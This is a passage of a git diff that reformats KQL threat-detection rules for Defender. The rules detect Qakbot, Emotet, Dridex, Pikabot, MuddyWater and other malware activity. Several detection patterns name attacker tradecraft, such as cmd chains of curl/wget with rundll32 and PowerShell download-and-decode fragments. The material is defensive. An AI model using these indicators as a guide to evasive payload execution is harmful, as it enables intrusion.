MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\" and (FolderPath endswith ".txt" or FolderPath endswith ".xml") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql index 72bbf53f..58010ff5 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Dridex Activity -// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-10 -// Level: critical -// Description: Detects potential Dridex acitvity via specific process patterns -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Dridex Activity +// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-10 +// Level: critical +// Description: Detects potential Dridex acitvity via specific process patterns +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") and FolderPath endswith "\\svchost.exe") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"))) or (((ProcessCommandLine contains " -s " or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and FolderPath endswith "\\regsvr32.exe" and InitiatingProcessFolderPath endswith "\\excel.exe") and (not(ProcessCommandLine contains ".dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and ((ProcessCommandLine contains " /all" and FolderPath endswith "\\whoami.exe") or (ProcessCommandLine contains " view" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql index 6d8e6e06..29d8263c 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql @@ -1,10 +1,10 @@ -// Title: Potential Emotet Rundll32 Execution -// Author: FPT.EagleEye -// Date: 2020-12-25 -// Level: critical -// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Emotet Rundll32 Execution +// Author: FPT.EagleEye +// Date: 2020-12-25 +// Level: critical +// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine endswith ",RunDLL" or ProcessCommandLine endswith ",Control_RunDLL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((InitiatingProcessFolderPath endswith "\\tracker.exe" or (ProcessCommandLine endswith ".dll,Control_RunDLL" or ProcessCommandLine endswith ".dll\",Control_RunDLL" or ProcessCommandLine endswith ".dll',Control_RunDLL")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql index d166b902..b76c6179 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential EmpireMonkey Activity -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-04-02 -// Level: high -// Description: Detects potential EmpireMonkey APT activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential EmpireMonkey Activity +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-04-02 +// Level: high +// Description: Detects potential EmpireMonkey APT activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "/e:jscript" and ProcessCommandLine contains "\\Local\\Temp\\Errors.bat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql index 2ae3cece..52be6fd3 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql @@ -1,10 +1,10 @@ -// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\GoogleUpdate.exe" and InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe") and (not(((FolderPath startswith "C:\\Program Files\\Google\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\") or FolderPath contains "\\AppData\\Local\\Google\\Update\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql index 83db92ba..5115222b 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql @@ -1,11 +1,11 @@ -// Title: Potential Kapeka Decrypted Backdoor Indicator -// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-03 -// Level: high -// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. -// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, detection.emerging-threats - -DeviceFileEvents +// Title: Potential Kapeka Decrypted Backdoor Indicator +// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-03 +// Level: high +// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. +// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents | where ((FolderPath contains ":\\ProgramData\\" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "\\\\[a-zA-Z]{5,6}\\.wll") or (FolderPath endswith "\\win32log.exe" or FolderPath endswith "\\crdss.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql index 46aad136..9b82de63 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential Ke3chang/TidePool Malware Activity -// Author: Markus Neis, Swisscom -// Date: 2020-06-18 -// Level: high -// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 -// MITRE Tactic: Defense Evasion -// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Ke3chang/TidePool Malware Activity +// Author: Markus Neis, Swisscom +// Date: 2020-06-18 +// Level: high +// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 +// MITRE Tactic: Defense Evasion +// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "-Property DWORD -name DisableFirstRunCustomize -value 2 -Force" or ProcessCommandLine contains "-Property String -name Check_Associations -value" or ProcessCommandLine contains "-Property DWORD -name IEHarden -value 0 -Force" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql index 908034f0..defe9e0d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential MuddyWater APT Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-10 -// Level: high -// Description: Detects potential Muddywater APT activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential MuddyWater APT Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-10 +// Level: high +// Description: Detects potential Muddywater APT activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "vbscript:Close(Execute(\"CreateObject(" and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-w 1 -exec Bypass" and ProcessCommandLine contains "\\ProgramData\\") or (ProcessCommandLine contains "[Convert]::ToBase64String" and ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]" and ProcessCommandLine contains "GetResponse().GetResponseStream()" and ProcessCommandLine contains "[System.Net.HttpWebRequest]::Create(" and ProcessCommandLine contains "-bxor ") or (ProcessCommandLine contains "Win32_OperatingSystem" and ProcessCommandLine contains "Win32_NetworkAdapterConfiguration" and ProcessCommandLine contains "root\\SecurityCenter2" and ProcessCommandLine contains "[System.Net.DNS]") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql index b9c6973f..9029f324 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE -// Author: Alejandro Houspanossian ('@lekz86') -// Date: 2024-01-02 -// Level: medium -// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. -// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. -// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE +// Author: Alejandro Houspanossian ('@lekz86') +// Date: 2024-01-02 +// Level: medium +// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. +// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. +// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c") and (ProcessCommandLine contains " curl" or ProcessCommandLine contains " wget" or ProcessCommandLine contains " timeout " or ProcessCommandLine contains " ping ") and (ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " mkdir ") and (ProcessCommandLine contains " & " or ProcessCommandLine contains " || ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql index 3bbf2b20..e0f01066 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Qakbot Rundll32 Execution -// Author: X__Junior (Nextron Systems) -// Date: 2023-05-24 -// Level: high -// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Qakbot Rundll32 Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-24 +// Level: high +// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains ".dll" and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql index d34b78ea..19eb8fcc 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql @@ -1,11 +1,11 @@ -// Title: Potential Raspberry Robin CPL Execution Activity -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-03-07 -// Level: high -// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. -// This behavior was observed in multiple Raspberry-Robin variants. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Raspberry Robin CPL Execution Activity +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-03-07 +// Level: high +// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. +// This behavior was observed in multiple Raspberry-Robin variants. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".CPL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\control.exe") and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql index e1c48f91..26162c2d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql @@ -1,12 +1,12 @@ -// Title: Ps.exe Renamed SysInternals Tool -// Author: Florian Roth (Nextron Systems) -// Date: 2017-10-22 -// Level: high -// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats -// False Positives: -// - Renamed SysInternals tool - -DeviceProcessEvents +// Title: Ps.exe Renamed SysInternals Tool +// Author: Florian Roth (Nextron Systems) +// Date: 2017-10-22 +// Level: high +// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats +// False Positives: +// - Renamed SysInternals tool + +DeviceProcessEvents | where ProcessCommandLine contains "ps.exe -accepteula" and ProcessCommandLine contains "-s cmd /c netstat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql index 82745567..7161c835 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql @@ -1,12 +1,12 @@ -// Title: Qakbot Regsvr32 Calc Pattern -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-26 -// Level: high -// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Qakbot Regsvr32 Calc Pattern +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: high +// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s") and ProcessCommandLine endswith " calc" and FolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql index 96c97fea..ab910e2b 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql @@ -1,12 +1,12 @@ -// Title: Qakbot Rundll32 Exports Execution -// Author: X__Junior (Nextron Systems) -// Date: 2023-05-24 -// Level: critical -// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Qakbot Rundll32 Exports Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-24 +// Level: critical +// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine endswith "aslr" or ProcessCommandLine endswith "bind" or ProcessCommandLine endswith "DrawThemeIcon" or ProcessCommandLine endswith "GG10" or ProcessCommandLine endswith "GL70" or ProcessCommandLine endswith "jhbvygftr" or ProcessCommandLine endswith "kjhbhkjvydrt" or ProcessCommandLine endswith "LS88" or ProcessCommandLine endswith "Motd" or ProcessCommandLine endswith "N115" or ProcessCommandLine endswith "next" or ProcessCommandLine endswith "Nikn" or ProcessCommandLine endswith "print" or ProcessCommandLine endswith "qqqb" or ProcessCommandLine endswith "qqqq" or ProcessCommandLine endswith "RS32" or ProcessCommandLine endswith "Test" or ProcessCommandLine endswith "Time" or ProcessCommandLine endswith "Updt" or ProcessCommandLine endswith "vips" or ProcessCommandLine endswith "Wind" or ProcessCommandLine endswith "WW50" or ProcessCommandLine endswith "X555" or ProcessCommandLine endswith "XL55" or ProcessCommandLine endswith "xlAutoOpen" or ProcessCommandLine endswith "XS88") and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql index cb3e18a8..dc80e5ad 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql @@ -1,12 +1,12 @@ -// Title: Qakbot Rundll32 Fake DLL Extension Execution -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-24 -// Level: critical -// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Qakbot Rundll32 Fake DLL Extension Execution +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-24 +// Level: critical +// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql index 40b73934..ac8f2aa7 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql @@ -1,10 +1,10 @@ -// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE -// Author: TropChaud -// Date: 2023-01-26 -// Level: medium -// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE +// Author: TropChaud +// Date: 2023-01-26 +// Level: medium +// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "nsis_uns" and ProcessCommandLine contains "PrintUIEntry" and (ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or FolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql index df9b7bc2..5175147d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql @@ -1,10 +1,10 @@ -// Title: ScreenConnect - SlashAndGrab Exploitation Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: high -// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, detection.emerging-threats - -DeviceFileEvents +// Title: ScreenConnect - SlashAndGrab Exploitation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents | where (FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath contains "\\LB3.exe") or (FolderPath contains "C:\\mpyutd.msi" or FolderPath contains "C:\\perflogs\\RunSchedulerTaskOnce.ps1" or FolderPath contains "C:\\ProgramData\\1.msi" or FolderPath contains "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi" or FolderPath contains "C:\\ProgramData\\update.dat" or FolderPath contains "C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelAgentCore.dll" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelUI.exe" or FolderPath contains "C:\\Windows\\spsrv.exe" or FolderPath contains "C:\\Windows\\Temp\\svchost.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql index 2483af37..c836847d 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql @@ -1,12 +1,12 @@ -// Title: Small Sieve Malware File Indicator Creation -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2023-05-19 -// Level: high -// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Small Sieve 